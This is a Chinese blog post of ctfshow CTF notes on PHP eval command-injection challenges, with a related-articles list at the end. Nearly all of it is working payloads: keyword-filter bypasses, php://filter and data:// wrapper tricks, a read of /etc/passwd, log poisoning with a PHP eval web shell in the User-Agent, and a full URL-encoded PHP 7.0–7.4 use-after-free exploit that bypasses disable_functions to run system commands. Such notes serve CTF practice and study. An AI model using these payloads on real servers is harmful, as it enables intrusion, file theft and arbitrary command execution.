2021/10/27--2021/10/29CTF命令执行ctfshow

最新推荐文章于 2023-12-23 16:59:10 发布
最新推荐文章于 2023-12-23 16:59:10 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46241655/article/details/120998777
版权

目标获取flag

eval($c);

经过过滤关键字,传入参数执行

一、过滤

1.过滤flag

?c=system("cat fla*.php");

?c=phpinfo();

?c=phpinfo()?>

?c=system('ls');

2.过滤system,cat

?c=system("cp fla?.php 1.txt");

?c=`cp fla?.??? 1.txt`;

?c=eval($_GET[1]);&1=system('cat flag,php');

?c=ta''c fla?.php

3.过滤逗号,引号,分号,空格等

?c=include%0a$_GET[1]?>&1=/etc/passwd

?c=include%0a$_GET[1]?>&1=/bin/ls

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

?c=data://text/plain,<?php system("tac flag.php");?>

?c=data://text/plain,<?php system("mv fla?.php 1.txt");?>

?c=data://text/plain,<?php system("cp fl*.* 1.txt");?>

等于号是短标签?c=data://text/plain,<?=system("cp fl*.* 1.txt");?>

?c=show_source(next(arrary_reverse(scandir(pos(localeconv())))));

?c=session_start();system(session_id());cookie里面命令执行
value里面:ls等命令

获得当前所有变量?c=print_r(get_define_vars());

?c=print_r(next(get_define_vars()));

?c=eval(array_pop(next(get_define_vars())));
然后post传参1=system("tac fla?.php");

或运算构造原理,web41脚本使用见视频

A<-->%40|%01,16进制
避免出现%0d即回车构造
phpinfo();
('phpinfo')();
('system')('ls');
(('%40'|'%13').('%40'|'%19').('%40'|'%13').('%40'|'%14').('%40'|'%05').('%60'|'%0d'))(('%40'|'%0c').('%40'|'%13'));
%0d造成回车,命令不能执行
system
();

?c=mv${IFS}fla?.php${IFS}b.txt 重命名

?c=ta''c${IFS}fla?.php

?c=paste${IFS}fl?g.php%0a paste看内容

4.未过滤$

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

二、黑洞

?c=tac%20flag.php;ls

?c=tac%20flag.php%26%26ls

system($c,"  >/dev/null  2>&1");

>/dev/null 文件描述符往里面写的都不会保存

2>&1 1代表标准输出,2代表错误输出,3代表标准输入
把错误输出绑定到标准输出

?c=cp${IFS}/fla?${IFS}/var/www/html/b.txt||ls;

?c=mv${IFS}/fla?${IFS}/var/www/html/b.txt||ls;

?c=tac%09flag.php%26%26ls
%26<-->&<-->
?c=nl<fla''g.php%7c%7cls
%7c<-->|<-->

system自带打印返回结果
system返回值
成功则返回命令输出最后一行,失败返回false

三、上传文件(过滤数字字母给问号和点)

POST上传文件,上传的文件会保存在临时文件夹下,默认文件名为/tmp/phpXXXXXX,最后6个字符为随机大小写字母。
匹配大写字母ASCII用[@-[]

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST</title>
</head>
<body>
<form action="http://XXXXXXXXXXX" method="post" enctype="multipart/form-data">
	<label for="file">文件名:</label>
	<input type="file" name="file" id="file"><br>
	<input type="submit" name="submit" value="提交">
</form>
</body>
</html>

上传时抓包
把c参数传入
POST /?c=.%20/???/???[@-[] HTTP/1.1
内容改为

#!/bin/sh
tac /var/www/html/flag.php

四、函数禁用

?c=file_get_contents('flag.php');

?c=echo shell_exec('ls');

GET:?1=php://filter/convert.base64-encode/resource=flag.php
POST:c=include($_GET[1]);

1.ADD HEADER Name:User Agent Value:<?php eval($_POST[a]);?>
2.关闭ADD HEADER
3.POST:c=include($_GET[1]);&a=highlight_file('flag.php');
GET:?1=/var/log/nginx/access.log

?c=highlight_file('flag.php');

?c=show_source('flag.php');

?c=include('flag.php');echo $flag;

?c=include('flag.php');var_dump(get_defined_vars());

?c=print_r(scandir('.'));当前目录

题目把flag.php名字改为flag.txt

?c=var_dump(scandir('.'));当前目录

?c=var_dump(scandir('../'));当前目录

?c=var_dump(scandir('/'));当前目录

?c=highlight_file('/flag.txt');

五、更多

cURL实现GET和POST

?c=$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "file:///var/www//html/flag.php");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);curl_close($ch);print_r($output);

?c=include('/flag.txt');

?c=include('/flag.txt');exit();

global协议(看文件名)

c=$a="glob:// /*.txt";#根目录下所有txt文件
if($b=opendir($a))#读入
{
	while(($file=readdir($b))!==false)#循环读
	{
		echo"filename:".$file."\n";
	}
	closedir($b);
}
exit();
#发现名字为flag0.txt

使用uaf公开脚本,web72看视频

c=%0D%0A%0D%0A%23+PHP+7.0-7.4+disable_functions+bypass+PoC+%28*nix+only%29%0D%0A%23%0D%0A%23+Bug%3A+https%3A%2F%2Fbugs.php.net%2Fbug.php%3Fid%3D76047%0D%0A%23+debug_backtrace%28%29+returns+a+reference+to+a+variable+%0D%0A%23+that+has+been+destroyed%2C+causing+a+UAF+vulnerability.%0D%0A%23%0D%0A%23+This+exploit+should+work+on+all+PHP+7.0-7.4+versions%0D%0A%23+released+as+of+30%2F01%2F2020.%0D%0A%23%0D%0A%23+Author%3A+https%3A%2F%2Fgithub.com%2Fmm0r1%0D%0A%0D%0Apwn%28%22cat+%2Fflag0.txt%22%29%3B%0D%0A%0D%0Afunction+pwn%28%24cmd%29+%7B%0D%0A++++global+%24abc%2C+%24helper%2C+%24backtrace%3B%0D%0A%0D%0A++++class+Vuln+%7B%0D%0A++++++++public+%24a%3B%0D%0A++++++++public+function+__destruct%28%29+%7B+%0D%0A++++++++++++global+%24backtrace%3B+%0D%0A++++++++++++unset%28%24this-%3Ea%29%3B%0D%0A++++++++++++%24backtrace+%3D+%28new+Exception%29-%3EgetTrace%28%29%3B+%23+%3B%29%0D%0A++++++++++++if%28%21isset%28%24backtrace%5B1%5D%5B%27args%27%5D%29%29+%7B+%23+PHP+%3E%3D+7.4%0D%0A++++++++++++++++%24backtrace+%3D+debug_backtrace%28%29%3B%0D%0A++++++++++++%7D%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%0D%0A++++class+Helper+%7B%0D%0A++++++++public+%24a%2C+%24b%2C+%24c%2C+%24d%3B%0D%0A++++%7D%0D%0A%0D%0A++++function+str2ptr%28%26%24str%2C+%24p+%3D+0%2C+%24s+%3D+8%29+%7B%0D%0A++++++++%24address+%3D+0%3B%0D%0A++++++++for%28%24j+%3D+%24s-1%3B+%24j+%3E%3D+0%3B+%24j--%29+%7B%0D%0A++++++++++++%24address+%3C%3C%3D+8%3B%0D%0A++++++++++++%24address+%7C%3D+ord%28%24str%5B%24p%2B%24j%5D%29%3B%0D%0A++++++++%7D%0D%0A++++++++return+%24address%3B%0D%0A++++%7D%0D%0A%0D%0A++++function+ptr2str%28%24ptr%2C+%24m+%3D+8%29+%7B%0D%0A++++++++%24out+%3D+%22%22%3B%0D%0A++++++++for+%28%24i%3D0%3B+%24i+%3C+%24m%3B+%24i%2B%2B%29+%7B%0D%0A++++++++++++%24out+.%3D+sprintf%28%22%25c%22%2C%28%24ptr+%26+0xff%29%29%3B%0D%0A++++++++++++%24ptr+%3E%3E%3D+8%3B%0D%0A++++++++%7D%0D%0A++++++++return+%24out%3B%0D%0A++++%7D%0D%0A%0D%0A++++function+write%28%26%24str%2C+%24p%2C+%24v%2C+%24n+%3D+8%29+%7B%0D%0A++++++++%24i+%3D+0%3B%0D%0A++++++++for%28%24i+%3D+0%3B+%24i+%3C+%24n%3B+%24i%2B%2B%29+%7B%0D%0A++++++++++++%24str%5B%24p+%2B+%24i%5D+%3D+sprintf%28%22%25c%22%2C%28%24v+%26+0xff%29%29%3B%0D%0A++++++++++++%24v+%3E%3E%3D+8%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%0D%0A++++function+leak%28%24addr%2C+%24p+%3D+0%2C+%24s+%3D+8%29+%7B%0D%0A++++++++global+%24abc%2C+%24helper%3B%0D%0A++++++++write%28%24abc%2C+0x68%2C+%24addr+%2B+%24p+-+0x10%29%3B%0D%0A++++++++%24leak+%3D+strlen%28%24helper-%3Ea%29%3B%0D%0A++++++++if%28%24s+%21%3D+8%29+%7B+%24leak+%25%3D+2+%3C%3C+%28%24s+*+8%29+-+1%3B+%7D%0D%0A++++++++return+%24leak%3B%0D%0A++++%7D%0D%0A%0D%0A++++function+parse_elf%28%24base%29+%7B%0D%0A++++++++%24e_type+%3D+leak%28%24base%2C+0x10%2C+2%29%3B%0D%0A%0D%0A++++++++%24e_phoff+%3D+leak%28%24base%2C+0x20%29%3B%0D%0A++++++++%24e_phentsize+%3D+leak%28%24base%2C+0x36%2C+2%29%3B%0D%0A++++++++%24e_phnum+%3D+leak%28%24base%2C+0x38%2C+2%29%3B%0D%0A%0D%0A++++++++for%28%24i+%3D+0%3B+%24i+%3C+%24e_phnum%3B+%24i%2B%2B%29+%7B%0D%0A++++++++++++%24header+%3D+%24base+%2B+%24e_phoff+%2B+%24i+*+%24e_phentsize%3B%0D%0A++++++++++++%24p_type++%3D+leak%28%24header%2C+0%2C+4%29%3B%0D%0A++++++++++++%24p_flags+%3D+leak%28%24header%2C+4%2C+4%29%3B%0D%0A++++++++++++%24p_vaddr+%3D+leak%28%24header%2C+0x10%29%3B%0D%0A++++++++++++%24p_memsz+%3D+leak%28%24header%2C+0x28%29%3B%0D%0A%0D%0A++++++++++++if%28%24p_type+%3D%3D+1+%26%26+%24p_flags+%3D%3D+6%29+%7B+%23+PT_LOAD%2C+PF_Read_Write%0D%0A++++++++++++++++%23+handle+pie%0D%0A++++++++++++++++%24data_addr+%3D+%24e_type+%3D%3D+2+%3F+%24p_vaddr+%3A+%24base+%2B+%24p_vaddr%3B%0D%0A++++++++++++++++%24data_size+%3D+%24p_memsz%3B%0D%0A++++++++++++%7D+else+if%28%24p_type+%3D%3D+1+%26%26+%24p_flags+%3D%3D+5%29+%7B+%23+PT_LOAD%2C+PF_Read_exec%0D%0A++++++++++++++++%24text_size+%3D+%24p_memsz%3B%0D%0A++++++++++++%7D%0D%0A++++++++%7D%0D%0A%0D%0A++++++++if%28%21%24data_addr+%7C%7C+%21%24text_size+%7C%7C+%21%24data_size%29%0D%0A++++++++++++return+false%3B%0D%0A%0D%0A++++++++return+%5B%24data_addr%2C+%24text_size%2C+%24data_size%5D%3B%0D%0A++++%7D%0D%0A%0D%0A++++function+get_basic_funcs%28%24base%2C+%24elf%29+%7B%0D%0A++++++++list%28%24data_addr%2C+%24text_size%2C+%24data_size%29+%3D+%24elf%3B%0D%0A++++++++for%28%24i+%3D+0%3B+%24i+%3C+%24data_size+%2F+8%3B+%24i%2B%2B%29+%7B%0D%0A++++++++++++%24leak+%3D+leak%28%24data_addr%2C+%24i+*+8%29%3B%0D%0A++++++++++++if%28%24leak+-+%24base+%3E+0+%26%26+%24leak+-+%24base+%3C+%24data_addr+-+%24base%29+%7B%0D%0A++++++++++++++++%24deref+%3D+leak%28%24leak%29%3B%0D%0A++++++++++++++++%23+%27constant%27+constant+check%0D%0A++++++++++++++++if%28%24deref+%21%3D+0x746e6174736e6f63%29%0D%0A++++++++++++++++++++continue%3B%0D%0A++++++++++++%7D+else+continue%3B%0D%0A%0D%0A++++++++++++%24leak+%3D+leak%28%24data_addr%2C+%28%24i+%2B+4%29+*+8%29%3B%0D%0A++++++++++++if%28%24leak+-+%24base+%3E+0+%26%26+%24leak+-+%24base+%3C+%24data_addr+-+%24base%29+%7B%0D%0A++++++++++++++++%24deref+%3D+leak%28%24leak%29%3B%0D%0A++++++++++++++++%23+%27bin2hex%27+constant+check%0D%0A++++++++++++++++if%28%24deref+%21%3D+0x786568326e6962%29%0D%0A++++++++++++++++++++continue%3B%0D%0A++++++++++++%7D+else+continue%3B%0D%0A%0D%0A++++++++++++return+%24data_addr+%2B+%24i+*+8%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%0D%0A++++function+get_binary_base%28%24binary_leak%29+%7B%0D%0A++++++++%24base+%3D+0%3B%0D%0A++++++++%24start+%3D+%24binary_leak+%26+0xfffffffffffff000%3B%0D%0A++++++++for%28%24i+%3D+0%3B+%24i+%3C+0x1000%3B+%24i%2B%2B%29+%7B%0D%0A++++++++++++%24addr+%3D+%24start+-+0x1000+*+%24i%3B%0D%0A++++++++++++%24leak+%3D+leak%28%24addr%2C+0%2C+7%29%3B%0D%0A++++++++++++if%28%24leak+%3D%3D+0x10102464c457f%29+%7B+%23+ELF+header%0D%0A++++++++++++++++return+%24addr%3B%0D%0A++++++++++++%7D%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%0D%0A++++function+get_system%28%24basic_funcs%29+%7B%0D%0A++++++++%24addr+%3D+%24basic_funcs%3B%0D%0A++++++++do+%7B%0D%0A++++++++++++%24f_entry+%3D+leak%28%24addr%29%3B%0D%0A++++++++++++%24f_name+%3D+leak%28%24f_entry%2C+0%2C+6%29%3B%0D%0A%0D%0A++++++++++++if%28%24f_name+%3D%3D+0x6d6574737973%29+%7B+%23+system%0D%0A++++++++++++++++return+leak%28%24addr+%2B+8%29%3B%0D%0A++++++++++++%7D%0D%0A++++++++++++%24addr+%2B%3D+0x20%3B%0D%0A++++++++%7D+while%28%24f_entry+%21%3D+0%29%3B%0D%0A++++++++return+false%3B%0D%0A++++%7D%0D%0A%0D%0A++++function+trigger_uaf%28%24arg%29+%7B%0D%0A++++++++%23+str_shuffle+prevents+opcache+string+interning%0D%0A++++++++%24arg+%3Dstr_shuffle%28%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27%29%3B%0D%0A++++++++%24vuln+%3D+new+Vuln%28%29%3B%0D%0A++++++++%24vuln-%3Ea+%3D+%24arg%3B%0D%0A++++%7D%0D%0A%0D%0A++++if%28stristr%28PHP_OS%2C+%27WIN%27%29%29+%7B%0D%0A++++++++die%28%27This+PoC+is+for+*nix+systems+only.%27%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++%24n_alloc+%3D+10%3B+%23+increase+this+value+if+UAF+fails%0D%0A++++%24contiguous+%3D+%5B%5D%3B%0D%0A++++for%28%24i+%3D+0%3B+%24i+%3C+%24n_alloc%3B+%24i%2B%2B%29%0D%0A++++++++%24contiguous%5B%5D+%3D+str_shuffle%28%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27%29%3B%0D%0A%0D%0A++++trigger_uaf%28%27x%27%29%3B%0D%0A++++%24abc+%3D+%24backtrace%5B1%5D%5B%27args%27%5D%5B0%5D%3B%0D%0A%0D%0A++++%24helper+%3D+new+Helper%3B%0D%0A++++%24helper-%3Eb+%3D+function+%28%24x%29+%7B+%7D%3B%0D%0A%0D%0A++++if%28strlen%28%24abc%29+%3D%3D+79+%7C%7C+strlen%28%24abc%29+%3D%3D+0%29+%7B%0D%0A++++++++die%28%22UAF+failed%22%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++%23+leaks%0D%0A++++%24closure_handlers+%3D+str2ptr%28%24abc%2C+0%29%3B%0D%0A++++%24php_heap+%3D+str2ptr%28%24abc%2C+0x58%29%3B%0D%0A++++%24abc_addr+%3D+%24php_heap+-+0xc8%3B%0D%0A%0D%0A++++%23+fake+value%0D%0A++++write%28%24abc%2C+0x60%2C+2%29%3B%0D%0A++++write%28%24abc%2C+0x70%2C+6%29%3B%0D%0A%0D%0A++++%23+fake+reference%0D%0A++++write%28%24abc%2C+0x10%2C+%24abc_addr+%2B+0x60%29%3B%0D%0A++++write%28%24abc%2C+0x18%2C+0xa%29%3B%0D%0A%0D%0A++++%24closure_obj+%3D+str2ptr%28%24abc%2C+0x20%29%3B%0D%0A%0D%0A++++%24binary_leak+%3D+leak%28%24closure_handlers%2C+8%29%3B%0D%0A++++if%28%21%28%24base+%3D+get_binary_base%28%24binary_leak%29%29%29+%7B%0D%0A++++++++die%28%22Couldn%27t+determine+binary+base+address%22%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++if%28%21%28%24elf+%3D+parse_elf%28%24base%29%29%29+%7B%0D%0A++++++++die%28%22Couldn%27t+parse+ELF+header%22%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++if%28%21%28%24basic_funcs+%3D+get_basic_funcs%28%24base%2C+%24elf%29%29%29+%7B%0D%0A++++++++die%28%22Couldn%27t+get+basic_functions+address%22%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++if%28%21%28%24zif_system+%3D+get_system%28%24basic_funcs%29%29%29+%7B%0D%0A++++++++die%28%22Couldn%27t+get+zif_system+address%22%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++%23+fake+closure+object%0D%0A++++%24fake_obj_offset+%3D+0xd0%3B%0D%0A++++for%28%24i+%3D+0%3B+%24i+%3C+0x110%3B+%24i+%2B%3D+8%29+%7B%0D%0A++++++++write%28%24abc%2C+%24fake_obj_offset+%2B+%24i%2C+leak%28%24closure_obj%2C+%24i%29%29%3B%0D%0A++++%7D%0D%0A%0D%0A++++%23+pwn%0D%0A++++write%28%24abc%2C+0x20%2C+%24abc_addr+%2B+%24fake_obj_offset%29%3B%0D%0A++++write%28%24abc%2C+0xd0+%2B+0x38%2C+1%2C+4%29%3B+%23+internal+func+type%0D%0A++++write%28%24abc%2C+0xd0+%2B+0x68%2C+%24zif_system%29%3B+%23+internal+func+handler%0D%0A%0D%0A++++%28%24helper-%3Eb%29%28%24cmd%29%3B%0D%0A++++exit%28%29%3B%0D%0A%7D%0D%0A

绕过open_basedir和disable_function

c=
try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
        'root');

    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo ($row[0]) . "|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);

FFI绕过disable_functions(php7.4)
用var_dump先看目录

c=$ffi = FFI::cdef("int system(const char *command);");
$a='/readflag>/var/www/html/1.txt';
$ffi->system($a);exit();

巧妙构造

code=${PATH:~A}${PWD:~A} ????.???

#表示得到变量的值的长度

${#变量}

code=${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?????${#RANDOM} ????.???

$?
上一条命令返回值。通常0代表执行成功,非0代表执行有误。
但其0和非0代码长度都是1

code=${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.???

<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???

进制转换绕过

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos});&abs=system&acos=tac flag.php
专注pwn0年
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF实战26 CTF题目练习和讲解四
Innocence_0的博客
03-15 504
这一阶段我们将会开始接触逆向()类的题目小提示:看懂汇编,C语言是关键~还要熟悉各种壳的脱~难度**(中等以下)**且的值为值为。
实验吧-ctf-misc
zhang14916的博客
07-22 6120
1.欢迎来到地狱 用winhex对第一个jpg文件补头,获取网址https://pan.baidu.com/s/1i49Jhlj,打开得到音乐文件,用Audacity打开获取摩斯电码,破解,获得密码KEYLETUSGO,打开word文档,查看隐藏字符获得image steganography提示,用网页版image steganography解密文档中的哈士奇图片,获得key{you are i...
青少年CTF-qsnctf-Web-include01&include02(多种方法-知识点较多-建议收藏!)
m0_73734159的博客
12-23 1777
php://data协议是PHP中的一种特殊协议,可以在包含函数中被用来执行一些特殊的操作。它没有条件限制,但仅能用于在CTF(Capture The Flag)中读取本地文件,且不受allow_url_fopen与allow_url_include的影响。php://input是PHP提供的一个伪协议,允许开发者访问POST请求的原始内容。因为根目录下只有flag这一个f开头的文件 所以查看的就是flag文件的内容咯。题目描述:你能否获取Flag呢,flag格式为:qsnctf{xxx}。
CTF】shell 通配符 / glob 模式——简单理解及利用
m0_52923241的博客
08-11 1282
通配符简介 glob 模式(globbing)也被称之为 shell 通配符,名字的起源来自于 Unix V6 中的/etc/glob (详见 man 文档)。glob 是一种特殊的模式匹配,最常见的是通配符拓展,也可以将 glob 模式设为精简了的正则表达式,在最新的 CentOS 7 中已经删除了 glob 的相关描述文档,删除的原因由于 glob 已经整合到了 shell 之中,然后就有了 shell 通配符。shell 通配符 / glob 模式通常用来匹配目录以及文件,而不是文本!!! Li
ctf misc 图片隐写(所见非真)
m0_62584974的博客
04-09 2966
第一次写misc题目走好多坑记录一下解题思路了 得到题目 一个压缩包还有一个照片 用Winhex打开它 在文件的最后发现了flag.txt,要把它提取出来 把该图片文件拉入kali的主文件夹(没有kali的在VM上装个kali^^) 用binwalk这个命令分解这个图片的文件 binwalk - e scada. ipg 得到这个文件夹 ...
ctfshow 年ctf
qq_61768489的博客
02-10 719
来设置私有属性,给一个未定义的属性赋值时,触发__set(),传递的参数是被设置的属性名和值.所以,2023是兔年,密码也是。聪明的小伙伴们,你能破解出下面的密码吗?老g师傅最近发现了一个有趣的ctf工具,你能找出flag吗?据说上面的无线电信号代表的是中文,由红岸基地发往半人马星系。弱比较和强比较的问题 2023那里是强比较,还是很容易的。里面的$this->key,为happy2year类。还有个(),所以是个无参函数, 有个trick是。虽然exp比较简单,但是里面的逻辑挺值得学习的。
CTFSHOW 年CTF(web部分)
羽的博客
01-29 1710
CTFSHOW 年CTF
ctfshow_年ctf-wp
网安小菜鸡
01-30 799
ctfshow年ctf2023-wp
CTFshow_年CTF 2023
weixin_45908624的博客
01-28 744
_年CTF
CTF秀--年CTF
m0_59022585的博客
07-11 112
打开链接对PHP代码分析,使year=2022.时,==判断前先转换成字符串型判断为真,year+1后为浮点型,!==判断也为真,得到flag。通过分析密文首部和提示可以知道使用了Rabbit(兔)加密,提示也给出了密码(2023),使用Rabbit解密得到flag。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-反编译相关资料
03-11
包括学习的PPT,常见的用于反编译的工具,CaptfEncoder-win-x64-3.1.2.exe、CTF-Tools-v1.3.7.zip、GDA4.02.zip、jadx-gui-1.4.3-with-jre-win.zip
脱壳工具UPX -EXE/Dll资源压缩工具-UPX-4.2.2
最新发布
05-27
UPX是大家熟悉的EXE/Dll资源压缩工具,也称作可执行文件压缩工具、可执行文件加壳脱壳器,该程序的缺点是只能使用命令控制台运行。 .................. Free UPX简称FUPX,是专门针对UPX开发的图形窗口界面程序,...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF文件隐写总结之图片
weixin_57543652的博客
01-09 743
本文已参与「新人创作礼」活动,一起开启掘金创作之路。
CTF之图片隐写
abraham76的博客
10-10 9184
CTF的全称是Capture The Flag,直译过来就是“获取旗帜”。这种比赛属于网络安全领域,是网络安全技术人员之间的一种竞技形式。CTF起源于1996年DEFCON全球黑客大会,以代替黑客们通过发起真实攻击进行技术比拼。发展至今,全球已经有各种CFT类的比赛了,DEFCON作为CTF赛制的源头,DEFCON CTF自然成为了全球最高技术水平和影响力的CTF竞赛,类似于足球里的“世界杯” ,比赛的奖金也很高。
ctfshow-年_ctf初一初二
qq_47804678的博客
03-22 274
)弱比较会自动将两边转换成同一类型,只需要比较值是否相等;==)强比较是值和类型都会进行比较。所以我们可以将year=2022.0,在比较时值相同但是类型不同,刚好能通过,最后得到flag。
ctfshow 新年欢乐赛WP
博客地址 www.sec0nd.top
02-21 524
文章目录热身方法一方法二web1web2web3web4 热身 <?php eval($_GET['f']); 方法一 打开之后先查看phpinfo() 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可得flag 方法二 第二种思路是,查看当前页面得变量,直接出flag ?f=print_r(get_defined_vars()); web1 <?php highlight_file(__FILE__); error_reporting(0);
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值